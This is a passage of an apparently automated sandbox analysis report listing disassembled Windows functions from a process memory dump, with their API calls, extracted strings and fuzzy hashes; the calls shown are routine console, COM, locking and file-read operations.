                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateEvent$CloseHandleInitializeOnce$CurrentExecuteHandlesInitInstanceMultipleSecurityThreadUninitializeWait
                                                                                          • String ID:
                                                                                          • API String ID: 2536006573-0
                                                                                          • Opcode ID: ea576fd22e638105744acb36e0a5d55a1f91304752d3b7956cbf6e647319cfe6
                                                                                          • Instruction ID: a1f755337466dc251aca3730a4093920728c046b0eac5df061652268f5ff96ee
                                                                                          • Opcode Fuzzy Hash: ea576fd22e638105744acb36e0a5d55a1f91304752d3b7956cbf6e647319cfe6
                                                                                          • Instruction Fuzzy Hash: B3315071601305AFE7116FB0AC9CFBABBADEB44749B04402BF506E2351DB76D904AB31
                                                                                          Function 00DD38F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,000000C8), ref: 00DD391E
                                                                                          • LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 00DD3963
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD3992
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD39D0
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,00DD1844,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD39E6
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00DD3A15
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 00DD3A1C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
                                                                                          • String ID: CONOUT$
                                                                                          • API String ID: 258192622-3130406586
                                                                                          • Opcode ID: 51ad7b869b0aa3bbc258c09cc28cb3e2e2d0f1c418b5727f501c515e6770a006
                                                                                          • Instruction ID: 7f9678237b08fe1b9b8ad4a8ff69c65f90ef7c2b6d776495105180a7c90c90f2
                                                                                          • Opcode Fuzzy Hash: 51ad7b869b0aa3bbc258c09cc28cb3e2e2d0f1c418b5727f501c515e6770a006
                                                                                          • Instruction Fuzzy Hash: BC318271600229ABEB20DB64DC55FEBB77CEB45B05F044096FA0AD6280E670EB49CE71
                                                                                          Function 00DD33F9 Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3431
                                                                                          • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00DD3443
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD346A
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD347C
                                                                                          • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD34CF
                                                                                          • EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00DD34E1
                                                                                          • DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(00000000), ref: 00DD34EF
                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00DD350F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
                                                                                          • String ID:
                                                                                          • API String ID: 3770696666-0
                                                                                          • Opcode ID: c6080ee552c9cf45b5077d5d57bb1153e8b6ba827da848bdeb5c5d82dad3e09b
                                                                                          • Instruction ID: 54510751c70210473b552621706d565c0d7c7e3e24ad53a0f8201c8ac912023d
                                                                                          • Opcode Fuzzy Hash: c6080ee552c9cf45b5077d5d57bb1153e8b6ba827da848bdeb5c5d82dad3e09b
                                                                                          • Instruction Fuzzy Hash: A3412B79A01318EFCB05DF64D89896DBBB9FF49710718409AE906E7320CB31AE01CFA1
                                                                                          Function 00DD2B5A Relevance: 12.1, APIs: 8, Instructions: 100synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?), ref: 00DD2B6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 24740636-0
                                                                                          • Opcode ID: 87e198af46a1f898b718ca6cdd15e64ded9ccc2834af0b0347d7598632395ccb
                                                                                          • Instruction ID: bc79b0edd7952bb0aaa5cbe51b96ee79911cac428fb988f3e85558e9182c5f9a
                                                                                          • Opcode Fuzzy Hash: 87e198af46a1f898b718ca6cdd15e64ded9ccc2834af0b0347d7598632395ccb
                                                                                          • Instruction Fuzzy Hash: E231CA3061030AABEB205E69DC88BBF7769EF61360F244073F596D6394D3B5CD0296B2
                                                                                          Function 00DD3D62 Relevance: 12.1, APIs: 8, Instructions: 98libraryloadermemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wtoi.MSVCRT(?), ref: 00DD3D94
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 00DD3DA0
                                                                                          • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00DD3DD3
                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 00DD3DF1
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E13
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E30
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E43
                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 00DD3E4C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
                                                                                          • String ID:
                                                                                          • API String ID: 3528786098-0
                                                                                          • Opcode ID: e9be804da0a89780e048e13226dacaa1a0be85e656f267a536016758f05ff73f
                                                                                          • Instruction ID: ef16e82347842a14583fc87a91b81f59f4f2475563c33f5412b6a31ffd3781ee
                                                                                          • Opcode Fuzzy Hash: e9be804da0a89780e048e13226dacaa1a0be85e656f267a536016758f05ff73f
                                                                                          • Instruction Fuzzy Hash: AE31BF75501212AFCB215B64DC589BBBFB9EF89710718416AFD05C3390D7B19E02CAB1
                                                                                          Function 00DD3A51 Relevance: 9.1, APIs: 6, Instructions: 68fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00DD3A7B
                                                                                          • memset.MSVCRT ref: 00DD3A8F
                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00DD3AA6
                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00DD3AC1
                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00DD3AE1
                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00DD3AF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Read$CloseCreateHandlePointermemset
                                                                                          • String ID:
                                                                                          • API String ID: 3827546496-0
                                                                                          • Opcode ID: a64b4fcb13026bd4249bf45967285f849300f38f4bf038dead6acf81d0c35162
                                                                                          • Instruction ID: b0c2c423bca60f2d51ea21bac89e893c33b9bec18873c0447f6cdee965083ffa
                                                                                          • Opcode Fuzzy Hash: a64b4fcb13026bd4249bf45967285f849300f38f4bf038dead6acf81d0c35162
                                                                                          • Instruction Fuzzy Hash: F31190317012247BD7209B659C49FFF7B7CEF45B60F040156FA18E22D0EA709A4ACAB1
                                                                                          Function 00DD6735 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00DD6762
                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD6771
                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00DD677A
                                                                                          • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00DD6783
                                                                                          • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00DD6798
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                          • String ID:
                                                                                          • API String ID: 1445889803-0
                                                                                          • Opcode ID: ab882289a5e9e7f109a12e346c47350a6663dd5ae3720bc7fa7ca8c2b00d528b
                                                                                          • Instruction ID: 2b66d4bd71bc06f6bce8f2ac5a3d6aa7dadf342b2d7f5fb66feed09b275c7989
                                                                                          • Opcode Fuzzy Hash: ab882289a5e9e7f109a12e346c47350a6663dd5ae3720bc7fa7ca8c2b00d528b
                                                                                          • Instruction Fuzzy Hash: DF113671D02308AFCB20DBB8DA48A9EB7F5EF58315F5548A6D402E7314EB319B049BA0
                                                                                          Function 00DD5695 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 245COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 00DD5885
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharNext
                                                                                          • String ID: /$localserver$sta
                                                                                          • API String ID: 3213498283-3694077230
                                                                                          • Opcode ID: 6eb67b42abb9c71df2678e39b1b7773cff10a92eff9c57c4bc08fd48352e8eba
                                                                                          • Instruction ID: 285c81b3411476e16784cdc6dec2d2b2b6acd7f7ac158f4ef73778e79433a856
                                                                                          • Opcode Fuzzy Hash: 6eb67b42abb9c71df2678e39b1b7773cff10a92eff9c57c4bc08fd48352e8eba
                                                                                          • Instruction Fuzzy Hash: 7071A479A00616EBCF30DF59A4206B9B7F1EF58750B6C446BE885EB384EA708E41D770
                                                                                          Function 00DD24E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00DD24EB
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00DD24F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                          • API String ID: 1646373207-919018592
                                                                                          • Opcode ID: e8d1c05d214569efbb89319ddde7ace2746db0b380f4b4839f3d80897a332409
                                                                                          • Instruction ID: 4de1b0a201d6ccedb1f8ca7ace87169f85e83776946098ff1b10717eefc37976
                                                                                          • Opcode Fuzzy Hash: e8d1c05d214569efbb89319ddde7ace2746db0b380f4b4839f3d80897a332409
                                                                                          • Instruction Fuzzy Hash: 57E0EC3A541329BB8B212FA1FC19C9ABF29EB447A17044413FD0992360CA728811DBB0
                                                                                          Function 00DD3306 Relevance: 6.1, APIs: 4, Instructions: 94COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3381
                                                                                          • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD339A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExclusiveLock$AcquireRelease
                                                                                          • String ID:
                                                                                          • API String ID: 17069307-0
                                                                                          • Opcode ID: 132340c61de56ffc91fdf3169b909dd515769c96aeaa0bb858cc85d901161943
                                                                                          • Instruction ID: 158cb396eb14fb4d0178ade33ba0a15999ebbd82710e4a316394d8aef2d96e24
                                                                                          • Opcode Fuzzy Hash: 132340c61de56ffc91fdf3169b909dd515769c96aeaa0bb858cc85d901161943
                                                                                          • Instruction Fuzzy Hash: 9F319375611624EFCB059B28DD98A6DBBA9FF49310B094097E806DB360CF31EE01CBB5
                                                                                          Function 00DD3FE7 Relevance: 6.1, APIs: 4, Instructions: 55comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 00DD4003
                                                                                          • CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00DD4012
                                                                                          • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,00DD1970,?,?,?), ref: 00DD402D
                                                                                          • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 00DD405E
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromInitializeInstanceStringUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2575628211-0
                                                                                          • Opcode ID: b9e5eeac7d1994ad890b07277adcc3435746f758258d3efb9f08359aa49e1afe
                                                                                          • Instruction ID: c04c396dd4408d8c717bf3d9a2746422e5ebbb7fdc4ef7d72e6fb0e4f05d199b
                                                                                          • Opcode Fuzzy Hash: b9e5eeac7d1994ad890b07277adcc3435746f758258d3efb9f08359aa49e1afe
                                                                                          • Instruction Fuzzy Hash: FE115E31B01218AFD710DB65DC59FAEBBB9EF49711F00005AE606E7390CB72A901CBB5
                                                                                          Function 00DD5E80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00DD6598: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00DD659F
                                                                                          • __set_app_type.MSVCRT ref: 00DD5E92
                                                                                          • __p__fmode.MSVCRT ref: 00DD5EA8
                                                                                          • __p__commode.MSVCRT ref: 00DD5EB6
                                                                                          • __setusermatherr.MSVCRT ref: 00DD5ED7
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                          • String ID:
                                                                                          • API String ID: 1632413811-0
                                                                                          • Opcode ID: ad032356042d243fe372338c49005ae5904bb7d5ce506732bafb5867c9166b36
                                                                                          • Instruction ID: 0d044f79c4174bc7df7fa8014814c61da4536620141d4e77c7caffbd7fbd2f65
                                                                                          • Opcode Fuzzy Hash: ad032356042d243fe372338c49005ae5904bb7d5ce506732bafb5867c9166b36
                                                                                          • Instruction Fuzzy Hash: 50F0D4B0542305AFCB25AB34BC5A5147B60E705721B104A4BE462C23EADF3AC0589A74
                                                                                          Function 00DD5490 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80040111,?), ref: 00DD55D9
                                                                                            • Part of subcall function 00DD33F9: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD3431
                                                                                            • Part of subcall function 00DD33F9: DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 00DD3443
                                                                                            • Part of subcall function 00DD33F9: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00DD346A
                                                                                          • RoOriginateErrorW.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80070057,00000012,?), ref: 00DD5616
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLockOriginateShared$AcquireDecodePointerRelease
                                                                                          • String ID: activatibleClassId
                                                                                          • API String ID: 3068322146-2691401494
                                                                                          • Opcode ID: 257eb5c15bedf9b6f8ced37082c14a2b9d773ff4b1258bd655a10a37ca9842d4
                                                                                          • Instruction ID: a185098b738f02e59c0a145333b1621dd6fa27c8dd3cf70866f30e1cabf1095d
                                                                                          • Opcode Fuzzy Hash: 257eb5c15bedf9b6f8ced37082c14a2b9d773ff4b1258bd655a10a37ca9842d4
                                                                                          • Instruction Fuzzy Hash: 86419A75A11618EBCB159F68FC44AAEB7BAFB58310B15001AE802E7354DB31ED01CBB0
                                                                                          Function 00DD4751 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040,?,00000000,00000000), ref: 00DD4771
                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001,?,?,?,?,?,00000000), ref: 00DD47A5
                                                                                            • Part of subcall function 00DD46CA: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,00DD2B21,00000000,?,?), ref: 00DD46DA
                                                                                            • Part of subcall function 00DD46CA: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,00DD2B21,00000000,?,?), ref: 00DD46E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                          • String ID: Local\SM0:%d:%d:%hs
                                                                                          • API String ID: 779401067-4162240545
                                                                                          • Opcode ID: acee91628387f6af8b45c6bf97d97c6ac65aa95046e223dd5f6756e42472b04f
                                                                                          • Instruction ID: 81db0c70f3ec787b77f7025cc07b1c2ca5df289664f6550338079d44c58452ce
                                                                                          • Opcode Fuzzy Hash: acee91628387f6af8b45c6bf97d97c6ac65aa95046e223dd5f6756e42472b04f
                                                                                          • Instruction Fuzzy Hash: 1D41B272941238ABCB21EB64DC99AEA7769EF54750F104197F809A7341DB709E80DFF0
                                                                                          Function 00DD2C6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00DD2CC6
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DD2CD2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpenSemaphore
                                                                                          • String ID: _p0
                                                                                          • API String ID: 1909229842-2437413317
                                                                                          • Opcode ID: f9c55ae8529b40d318089a26a0fee46f69f4dcbeed840b6a32bb48c3612b1992
                                                                                          • Instruction ID: e7f2e90e87734a28b903e131d5e7b44d7c7804b30e45db1912cdf33fabd8de7d
                                                                                          • Opcode Fuzzy Hash: f9c55ae8529b40d318089a26a0fee46f69f4dcbeed840b6a32bb48c3612b1992
                                                                                          • Instruction Fuzzy Hash: 4821ACB1204306AB8315EF29D895D7BB7EAEFE8310F10862BF85587354DB30DC058AB2
                                                                                          Function 00DD6B60 Relevance: 5.1, APIs: 4, Instructions: 74memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00DD4925
                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00DD4936
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD495D
                                                                                          • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00DD4964
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DD0000, based on PE: true
                                                                                          • Associated: 0000000A.00000002.4116333075.0000000000DD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          • Associated: 0000000A.00000002.4116559504.0000000000DD9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_dd0000_encvbk.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$FreeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1234203156-0
                                                                                          • Opcode ID: a7883f7366d8faa3cb1a525fb5f431d5510afa5c96addce60002b9a6adefeba5
                                                                                          • Instruction ID: 7aef429b561acf7a37630a332e407c3e647524bf144af21febf57ff35ef64d51
                                                                                          • Opcode Fuzzy Hash: a7883f7366d8faa3cb1a525fb5f431d5510afa5c96addce60002b9a6adefeba5
                                                                                          • Instruction Fuzzy Hash: A521AE31501210ABCB25AB61DDA5A7EBB69EF91705308405BF8069B325DB71DD05EBB0
                                                                                          Function 00DD48B7 Relevance: 5.1, APIs: 4, Instructions: 73memoryCOMMON
